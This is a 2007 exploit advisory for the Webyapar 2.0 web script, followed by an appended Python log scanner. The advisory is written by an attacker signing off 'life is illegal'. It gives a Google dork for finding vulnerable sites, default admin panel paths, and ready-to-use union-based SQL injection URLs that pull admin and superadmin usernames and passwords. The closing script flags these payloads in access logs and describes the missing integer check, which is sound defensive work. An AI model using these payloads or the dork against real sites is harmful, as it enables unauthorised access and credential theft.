# Title : Webyapar 2.0 Multiple Remote SQL Injection Vulnerabilities
# Published : 2007-07-25
# Author : bypass
#########################################################################################################################
#########################################################################################################################
############/$$$$$$$$$$$////$$$$$$$$$$$//###################///////////###############//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$/
###///////##/$$$$$$$$//////////$$$$$$$$//####################/////////#####//////$$$$$//$$$$/////////////$$$$////////////
##///////###/$$$$$$$////////////$$$$$$$//#####///////////#####///////#####///////$$$$$//$$$$/////////////$$$$////////////
##//////###///$$$$$$$//////////$$$$$$$///#####///////////#####//////#####////////$$$$$//$$$$/////////////$$$$////////////
##/////###/////$$$$$$$////////$$$$$$$////#####//////////######/////#####/////////$$$$$//$$$$/////////////$$$$////////////
##////###///////$$$$$$$//////$$$$$$$/////######////////#######////#####//////////$$$$$//$$$$/////////////$$$$////////////
##///###/////////$$$$$$$////$$$$$$$//////#######//////#######////#####///////////$$$$$//$$$$/////////////$$$$////////////
###################$$$$$$##$$$$$$################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$
####################$$$$$$$$$$$$#################################################$$$$$##$$$$$$$$$$$$$$$##$$$$$$$$$$$$$$$$
##///###////////////$$$$$$$$$$$$/////////#########////////////#####//////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$
##////###////////////$$$$$$$$$$//////////########////////////#####///////////////$$$$$/////////////$$$$//////////////$$$$
##/////###////////////$$$$$$$$///////////#######////////////#####////////////////$$$$$/////////////$$$$//////////////$$$$
##//////###////////////$$$$$$////////////#######///////////#####/////////////////$$$$$/////////////$$$$//////////////$$$$
###//////##/////////////$$$$/////////////#######//////////#####//////////////////$$$$$/////////////$$$$//////////////$$$$
############/////////////$$//////////////#######/////////#####///////////////////$$$$$//$$$$$$$$$$$$$$$//$$$$$$$$$$$$$$$$
#########################################################################################################################
#########################################################################################################################
##### TURKISH SECURİTY MAN AND C0D3R ####################### MAİL : dumanhack@gmail.com ###########################
##### - ##### web : ##########
##### PERFECT C0D3R AND SECURİTY ## >>>>>>>>>>>>>> MESSAGE : LIFE IS ILLEGAL <<<<<<<<<<<<<<< ##
#########################################################################################################################
# Title : webyapar v2.0 Remote Blind SQL Injection Vulnerability
# AUTHOR: : bypass
# script name : Webyapar v2.0 { 700$ }
# Language : Tr
# script web page : www.webyapar.com
# script bug : remote SQL injection
# script admin panel1 : http://victim/script_path/yonetim
# script admin panel2 : http://victim/script_path/yonetim2
# google dork : inurl:"?page=duyurular_detay&id="
# Message Tr : My English is not very good. The code's market sale price is $700. Besides SQL, the code also has XSS vulnerabilities,
but the XSS vulnerabilities will not be of much use to you. The admin panels are left at their defaults...
# Message Tr : Life is illegal - / -
< / -------------------------------------------------------------------------------------------------------- />
< / ------ Example sql bug 1 admin username : ------ / >
http://VİCTİM/SCRİPT_PATH/?page=download&kat_id=-116+union+all+select+0,kullanici+from+admin
< / ------ Example sql bug 1 admin password : ------ / >
http://VİCTİM/SCRİPT_PATH/?page=download&kat_id=-116+union+all+select+0,sifre+from+admin
< / ------ Example sql bug 2 superadmin password and admin username : ------ / >
http://VİCTİM/SCRİPT_PATH/?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+superadmin
< / -------------------------------------------------------------------------------------------------------- />
SQL injection bug 1 : /?page=download&kat_id=-116+union+all+select+0,sifre+from+admin
SQL injection bug 2 : /?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+admin
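Both bugs have the same root cause: the `kat_id` and `id` query parameters are only ever meant to hold an integer, but the script interpolates them into SQL unchecked, so a value that is not a plain integer is already a reliable indicator of abuse. The following Python script is an added example (not part of the advisory and not Webyapar code) that shows the server-side check the script is missing and applies it as a detection rule over web-server access logs. It assumes Apache-style log lines and the two parameter names taken from the advisory; the log lines, client addresses and timestamps are constructed for the example.

```python
import re
import urllib.parse
from typing import Dict, List

# Constructed sample access-log lines (Apache-style) modelled on the two
# injection points named in the advisory. Addresses and timestamps are invented.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Jul/2007:10:01:02 +0300] "GET /?page=download&kat_id=116 HTTP/1.1" 200 5120
203.0.113.9 - - [25/Jul/2007:10:01:07 +0300] "GET /?page=download&kat_id=-116+union+all+select+0,sifre+from+admin HTTP/1.1" 200 6200
203.0.113.9 - - [25/Jul/2007:10:01:09 +0300] "GET /?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+superadmin HTTP/1.1" 200 6300
203.0.113.7 - - [25/Jul/2007:10:02:00 +0300] "GET /?page=duyurular_detay&id=50 HTTP/1.1" 200 4100
203.0.113.9 - - [25/Jul/2007:10:02:30 +0300] "GET /?page=download&kat_id=-116%20union%20all%20select%200%2Csifre%20from%20admin HTTP/1.1" 200 6200
"""

# Query parameters the advisory shows being interpolated into SQL; the
# application only ever needs an integer in either of them.
INTEGER_PARAMS = {"kat_id", "id"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
INTEGER_RE = re.compile(r"^-?\d+$")
UNION_RE = re.compile(r"\bunion\b(\s+all)?\s+select\b", re.IGNORECASE)


def is_valid_integer_id(value: str) -> bool:
    """The check the vulnerable script should apply before building its query:
    accept only an optionally signed run of digits, nothing else."""
    return INTEGER_RE.fullmatch(value.strip()) is not None


def analyse_request(path: str) -> List[Dict[str, str]]:
    """Flag integer parameters whose decoded value is not a plain integer."""
    query = urllib.parse.urlsplit(path).query
    findings = []
    # parse_qsl decodes both '+' and %xx escapes, so URL-encoded variants of the
    # same payload are normalised before the check runs.
    for name, value in urllib.parse.parse_qsl(query, keep_blank_values=True):
        if name not in INTEGER_PARAMS or is_valid_integer_id(value):
            continue
        reason = "union-based injection" if UNION_RE.search(value) else "non-integer value"
        findings.append({"param": name, "value": value, "reason": reason})
    return findings


def scan_log(text: str) -> List[Dict[str, str]]:
    """Run analyse_request over every parsable request line; one record per finding."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for f in analyse_request(m.group("path")):
            records.append({"ip": m.group("ip"), "ts": m.group("ts"),
                            "status": m.group("status"), **f})
    return records


if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(f'{r["ts"]} {r["ip"]} {r["param"]}={r["value"]!r} -> {r["reason"]}')
```

The same `is_valid_integer_id` rule, applied in the script before the value reaches the query (and ideally combined with a bound integer parameter rather than string interpolation), removes both injection points; run over logs it turns up the requests in the advisory whether the payload arrives with `+` or percent-encoded spaces.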
# www.Syue.com [2007-07-25]